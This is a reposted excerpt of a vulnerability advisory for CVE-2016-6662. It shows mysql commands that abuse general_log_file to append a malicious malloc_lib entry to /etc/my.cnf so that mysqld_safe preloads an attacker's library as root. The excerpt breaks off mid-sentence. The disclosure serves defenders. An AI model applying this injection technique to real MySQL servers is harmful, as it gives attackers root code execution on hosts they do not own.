MySQl Remote Root Code Execution 0day Exploit (CVE-2016-6662)

=============================================
– Discovered by: Dawid Golunski
– http://legalhackers.com
– dawid (at) legalhackers.com

– CVE-2016-6662
– Release date: 12.09.2016
– Severity: Critical
=============================================

I. VULNERABILITY
————————-

MySQL set global general_log_file = ‘/etc/my.cnf’;
mysql> set global general_log = on;
mysql> select ‘
‘>
‘> ; injected config entry
‘>
‘> [mysqld]
‘> malloc_lib=/tmp/mysql_exploit_lib.so
‘>
‘> [separator]
‘>
‘> ‘;
1 row in set (0.00 sec)
mysql> set global general_log = off;

The resulting config would then have the following part appended:

root@debian:~/# cat /etc/my.cnf

[mysqld]

key_buffer = 16M
max_allowed_packet = 16M

/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:
Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock
Time Id Command Argument
160728 17:25:14 40 Query select ‘

; injected config entry

[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so

[separator]


160728 17:25:15 40 Query set global general_log = off

This config contains some redundant information that would normally cause MySQL
to fail to startup during a restart due to parsing issues.

However, the important part is that the config now contains the section:

[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so

mysqld_safe will read the shared library path correctly and add it to
the LD_PRELOAD environment variable before


Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/0z1_aQhvi9E/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html

Original article

Comments are closed.

Proudly powered by WordPress | Theme: Baskerville 2 by Anders Noren.

Up ↑

%d bloggers like this: